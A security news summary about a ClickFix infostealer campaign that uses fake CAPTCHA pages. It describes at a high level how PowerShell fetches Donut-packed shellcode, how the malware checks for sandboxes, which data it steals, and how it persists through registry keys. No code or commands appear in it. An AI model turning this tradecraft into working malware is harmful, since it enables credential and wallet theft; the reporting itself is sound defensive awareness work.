Key Findings:

• A new scam is targeting users by mimicking CAPTCHA verification systems

• The attack is an evolved version of the ClickFix attacks from early 2025 targeting restaurant bookings

• The multi-stage infection starts with a fake CAPTCHA, then triggers a PowerShell script to download malware

• The malware, known as an infostealer, targets cryptocurrency wallets, browser login data, and other sensitive information

Background

This research, shared with Hackread.com, indicates the campaign is an evolved version of the ClickFix attacks that targeted restaurant bookings in early 2025. The attack does not happen all at once, but rather starts when a person lands on a compromised website and is asked to complete a fake CAPTCHA.

Fake CAPTCHA Triggers Malware Infection

On January 23, 2026, analysts noticed the compromised site tried to trigger a command on the user's machine to read clipboard data using a Windows function called CClipDataObject::GetData. Further investigation revealed that once the victim interacts with the page, a built-in Windows tool called PowerShell is triggered. This reaches out to a hacker-controlled address to download the virus.

Stealthy Malware Deployment

Researchers found the hackers use software called Donut to hide their tracks. This creates a file named cptch.bin, known as shellcode, that allows the malware to hide directly in the computer's memory using commands like VirtualAlloc and CreateThread, making it nearly invisible to standard security scans.

Targeted Data Theft

The malware is programmed to be picky, first checking if it is running on a real computer or a virtual environment used by experts to catch hackers. Once it feels safe, it starts raiding the system, targeting:

• Cryptocurrency wallets such as MetaMask, Exodus, and Trust Wallet

• Saved logins from over 25 browsers, including Chrome, Edge, Opera GX, and Tor

• Steam accounts, VPN settings, and FTP details for website management

Persistence and Evasion Tactics

Researchers noted the hackers used the variable name "$finalPayload", which acted like a red flag for Microsoft Defender, flagging it as Behavior:Win32/SuspClickFix.C. However, the hackers remain persistent, hosting various versions across different addresses.

To keep the virus active, the attackers also tweak the RunMRU registry keys so the infection restarts every time the user boots up their computer.

Sources

• https://hackread.com/clickfix-attack-crypto-wallets-browsers-infostealer/

• https://www.reddit.com/r/InfoSecNews/comments/1rayisl/new_clickfix_attack_targets_crypto_wallets_and_25/

• https://www.linkedin.com/posts/dlross_new-clickfix-attack-targets-crypto-wallets-activity-7431178426973106176-KsQk